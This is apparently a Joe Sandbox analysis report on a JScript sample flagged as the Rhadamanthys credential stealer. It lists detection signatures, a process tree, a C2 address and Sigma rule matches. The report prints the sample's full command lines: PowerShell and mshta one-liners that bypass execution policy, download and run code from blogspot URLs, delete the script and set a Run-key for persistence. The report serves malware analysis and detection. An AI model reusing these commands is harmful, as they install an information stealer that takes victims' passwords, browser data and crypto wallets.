Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
0a0#U00a0.js

Overview

General Information

Sample name:0a0#U00a0.js
Analysis ID:1640931
MD5:4622368c48c8944b66952a57106f77c0
SHA1:83d4cfe14ce6e82bfb94521d15875340199cc336
SHA256:8fca8fbdaa5f0251a22fc7ccbd4bf650d3b1c806afe55cc69967e9df76f562f1
Infos:

Detection

RHADAMANTHYS
Score:100
Range:0 - 100
Confidence:100%

Signatures

Early bird code injection technique detected
Found malware configuration
JScript performs obfuscated calls to suspicious functions
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected RHADAMANTHYS Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code references suspicious native API functions
Allocates memory in foreign processes
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Checks if the current machine is a virtual machine (disk enumeration)
Creates an autostart registry key pointing to binary in C:\Windows
Creates autostart registry keys with suspicious values (likely registry only malware)
Creates multiple autostart registry keys
Deletes itself after installation
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Queues an APC in another process (thread injection)
Sigma detected: MSHTA Suspicious Execution 01
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to delete services
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Dllhost Internet Connection
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara detected Keylogger Generic

Classification

Process Tree

  • System is w10x64native
  • wscript.exe (PID: 1756 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0a0#U00a0.js" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
    • powershell.exe (PID: 4352 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep -Seconds 6; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • RegSvcs.exe (PID: 7100 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • RegSvcs.exe (PID: 1852 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
        • svchost.exe (PID: 8420 cmdline: "C:\Windows\System32\svchost.exe" MD5: B7C999040D80E5BF87886D70D992C51E)
          • svchost.exe (PID: 7624 cmdline: "C:\Windows\System32\svchost.exe" MD5: F586835082F632DC8D9404D83BC16316)
            • chrome.exe (PID: 8584 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" MD5: DB46628EA19F23DEF3D3639E33431AD6)
            • chrome.exe (PID: 8156 cmdline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chr446F.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/92db0035/42bc8076" MD5: DB46628EA19F23DEF3D3639E33431AD6)
              • chrome.exe (PID: 1592 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --field-trial-handle=2504,i,7433291875497265033,6303917918567854472,262144 --variations-seed-version --mojo-platform-channel-handle=2628 /prefetch:3 MD5: DB46628EA19F23DEF3D3639E33431AD6)
            • msedge.exe (PID: 8964 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" MD5: F755556B2CE14570A86FB983EEA72F97)
            • msedge.exe (PID: 8540 cmdline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chr524B.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/92db0035/b0766183" MD5: F755556B2CE14570A86FB983EEA72F97)
              • msedge.exe (PID: 8808 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --field-trial-handle=1628,i,15598181154832850491,9117469408654283260,262144 --variations-seed-version --mojo-platform-channel-handle=2364 /prefetch:3 MD5: F755556B2CE14570A86FB983EEA72F97)
            • wmlaunch.exe (PID: 6344 cmdline: "C:\Program Files\Windows Media Player\wmlaunch.exe" MD5: C8BCC18E4197CD207596A0AD4CDAACAC)
              • dllhost.exe (PID: 8076 cmdline: "C:\Windows\system32\dllhost.exe" MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • RegSvcs.exe (PID: 1756 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • RegSvcs.exe (PID: 3008 cmdline: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe" MD5: 3A77A4F220612FA55118FB8D7DDAE83C)
        • dw20.exe (PID: 2400 cmdline: dw20.exe -x -s 772 MD5: 89106D4D0BA99F770EAFE946EA81BB65)
      • RegSvcs.exe (PID: 2888 cmdline: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe" MD5: 3A77A4F220612FA55118FB8D7DDAE83C)
        • dw20.exe (PID: 4536 cmdline: dw20.exe -x -s 892 MD5: 89106D4D0BA99F770EAFE946EA81BB65)
      • MSBuild.exe (PID: 4112 cmdline: "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe" MD5: 84C42D0F2C1AE761BEF884638BC1EACD)
        • WerFault.exe (PID: 8312 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4112 -s 12 MD5: 40A149513D721F096DDF50C04DA2F01F)
        • WerFault.exe (PID: 9148 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4112 -s 56 MD5: 40A149513D721F096DDF50C04DA2F01F)
      • MSBuild.exe (PID: 664 cmdline: "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe" MD5: 84C42D0F2C1AE761BEF884638BC1EACD)
        • dw20.exe (PID: 8236 cmdline: dw20.exe -x -s 792 MD5: 89106D4D0BA99F770EAFE946EA81BB65)
    • SettingSyncHost.exe (PID: 8428 cmdline: "C:\Windows\System32\SettingSyncHost.exe" MD5: F4683A0D28814C70DAD2DE036530887D)
  • mshta.exe (PID: 8588 cmdline: C:\Windows\system32\mshta.EXE "javascript:var lhn = ['Shell.Application', 'SHELLEXECUTE', 'powershell', '-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;', '', 'open', 0], iax = ['Scripting.FileSystemObject', 'DeleteFile', 'WScript.ScriptFullName'], ijs = new ActiveXObject(lhn[0]), ckc = ijs[lhn[1]](lhn[2], lhn[3], lhn[4], lhn[5], lhn[6]);close(); new ActiveXObject(iax[0])[iax[1]](WScript[iax[2]]);" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • powershell.exe (PID: 8656 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • mshta.exe (PID: 8432 cmdline: "C:\Windows\system32\mshta.exe" "javascript:var fll = ['Shell.Application', 'SHELLEXECUTE', 'powershell', '-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
  • mshta.exe (PID: 2528 cmdline: C:\Windows\system32\mshta.EXE "javascript:var lhn = ['Shell.Application', 'SHELLEXECUTE', 'powershell', '-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;', '', 'open', 0], iax = ['Scripting.FileSystemObject', 'DeleteFile', 'WScript.ScriptFullName'], ijs = new ActiveXObject(lhn[0]), ckc = ijs[lhn[1]](lhn[2], lhn[3], lhn[4], lhn[5], lhn[6]);close(); new ActiveXObject(iax[0])[iax[1]](WScript[iax[2]]);" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • powershell.exe (PID: 4004 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • elevation_service.exe (PID: 1280 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exe" MD5: F557D8ABB5984175B3409105002C16D9)
  • mshta.exe (PID: 7248 cmdline: "C:\Windows\system32\mshta.exe" "javascript:var fll = ['Shell.Application', 'SHELLEXECUTE', 'powershell', '-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
  • elevation_service.exe (PID: 8216 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exe" MD5: F557D8ABB5984175B3409105002C16D9)
  • mshta.exe (PID: 5548 cmdline: C:\Windows\system32\mshta.EXE "javascript:var lhn = ['Shell.Application', 'SHELLEXECUTE', 'powershell', '-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;', '', 'open', 0], iax = ['Scripting.FileSystemObject', 'DeleteFile', 'WScript.ScriptFullName'], ijs = new ActiveXObject(lhn[0]), ckc = ijs[lhn[1]](lhn[2], lhn[3], lhn[4], lhn[5], lhn[6]);close(); new ActiveXObject(iax[0])[iax[1]](WScript[iax[2]]);" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • powershell.exe (PID: 5404 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • AvastBrowserUpdate.exe (PID: 7876 cmdline: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe MD5: 11F050CE28C68E39C16CC85D4DF51664)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RhadamanthysAccording to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
  • Sandworm
https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

Malware Configuration

Threatname: Rhadamanthys

{"C2 url": "https://185.208.159.170:2484/38d2415e410113/9do988c8.3o15p"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.289414206371.00000000035F3000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
    00000013.00000003.289415524202.0000000005200000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
      00000007.00000002.289413915589.00000000031D0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
        00000013.00000002.289527976273.0000000003000000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
          00000008.00000002.289417352866.00000000054B0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
            Click to see the 10 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            19.3.svchost.exe.5200000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              19.3.svchost.exe.5420000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                19.3.svchost.exe.5200000.6.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  19.3.svchost.exe.5200000.6.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                    19.3.svchost.exe.5420000.7.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: MSHTA Suspicious Execution 01
                      Source: Process startedAuthor: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule): Data: Command: C:\Windows\system32\mshta.EXE "javascript:var lhn = ['Shell.Application', 'SHELLEXECUTE', 'powershell', '-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;', '', 'open', 0], iax = ['Scripting.FileSystemObject', 'DeleteFile', 'WScript.ScriptFullName'], ijs = new ActiveXObject(lhn[0]), ckc = ijs[lhn[1]](lhn[2], lhn[3], lhn[4], lhn[5], lhn[6]);close(); new ActiveXObject(iax[0])[iax[1]](WScript[iax[2]]);", CommandLine: C:\Windows\system32\mshta.EXE "javascript:var lhn = ['Shell.Application', 'SHELLEXECUTE', 'powershell', '-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;', '', 'open', 0], iax = ['Scripting.FileSystemObject', 'DeleteFile', 'WScript.ScriptFullName'], ijs = new ActiveXObject(lhn[0]), ckc = ijs[lhn[1]](lhn[2], lhn[3], lhn[4], lhn[5], lhn[6]);close(); new ActiveXObject(iax[0])[iax[1]](WScript[iax[2]]);", CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1300, ProcessCommandLine: C:\Windows\system32\mshta.EXE "javascript:var lhn = ['Shell.Application', 'SHELLEXECUTE', 'powershell', '-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;', '', 'open', 0], iax = ['Scripting.FileSystemObject', 'DeleteFile', 'WScript.ScriptFullName'], ijs = new ActiveXObject(lhn[0]), ckc = ijs[lhn[1]](lhn[2], lhn[3], lhn[4], lhn[5], lhn[6]);close(); new ActiveXObject(iax[0])[iax[1]](WScript[iax[2]]);", ProcessId: 8588, ProcessName: mshta.exe
                      Sigma detected: Suspicious MSHTA Child Process
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\mshta.EXE "javascript:var lhn = ['Shell.Application', 'SHELLEXECUTE', 'powershell', '-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;', '', 'open', 0], iax = ['Scripting.FileSystemObject', 'DeleteFile', 'WScript.ScriptFullName'], ijs = new ActiveXObject(lhn[0]), ckc = ijs[lhn[1]](lhn[2], lhn[3], lhn[4], lhn[5], lhn[6]);close(); new ActiveXObject(iax[0])[iax[1]](WScript[iax[2]]);", ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 8588, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;, ProcessId: 8656, ProcessName: powershell.exe
                      Sigma detected: Suspicious PowerShell Parameter Substring
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep -Seconds 6;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep -Seconds 6;, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0a0#U00a0.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 1756, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep -Seconds 6;, ProcessId: 4352, ProcessName: powershell.exe
                      Sigma detected: WScript or CScript Dropper
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0a0#U00a0.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0a0#U00a0.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4352, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0a0#U00a0.js", ProcessId: 1756, ProcessName: wscript.exe
                      Sigma detected: Change PowerShell Policies to an Insecure Level
                      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep -Seconds 6;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep -Seconds 6;, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0a0#U00a0.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 1756, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep -Seconds 6;, ProcessId: 4352, ProcessName: powershell.exe
                      Sigma detected: CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: mshta "javascript:var fll = ['Shell.Application', 'SHELLEXECUTE', 'powershell', '-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;', '', 'open', 0], jve = ['Scripting.FileSystemObject', 'DeleteFile', 'WScript.ScriptFullName'], loo = new ActiveXObject(fll[0]); loo[fll[1]](fll[2], fll[3], fll[4], fll[5], fll[6]);close(); new ActiveXObject(jve[0])[jve[1]](WScript[jve[2]]);", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4352, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Usecurekala77
                      Sigma detected: Dllhost Internet Connection
                      Source: Network ConnectionAuthor: bartblaze: Data: DestinationIp: 185.208.159.170, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\dllhost.exe, Initiated: true, ProcessId: 8076, Protocol: tcp, SourceIp: 192.168.11.30, SourceIsIpv6: false, SourcePort: 49851
                      Sigma detected: Suspicious Powershell In Registry Run Keys
                      Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: mshta "javascript:var fll = ['Shell.Application', 'SHELLEXECUTE', 'powershell', '-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;', '', 'open', 0], jve = ['Scripting.FileSystemObject', 'DeleteFile', 'WScript.ScriptFullName'], loo = new ActiveXObject(fll[0]); loo[fll[1]](fll[2], fll[3], fll[4], fll[5], fll[6]);close(); new ActiveXObject(jve[0])[jve[1]](WScript[jve[2]]);", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4352, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Usecurekala77
                      Sigma detected: Uncommon Svchost Parent Process
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentProcessId: 1852, ParentProcessName: RegSvcs.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 8420, ProcessName: svchost.exe
                      Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                      Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0a0#U00a0.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0a0#U00a0.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4352, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0a0#U00a0.js", ProcessId: 1756, ProcessName: wscript.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep -Seconds 6;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep -Seconds 6;, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0a0#U00a0.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 1756, ParentProcessName: wscript.exe, ProcessCommandLine: 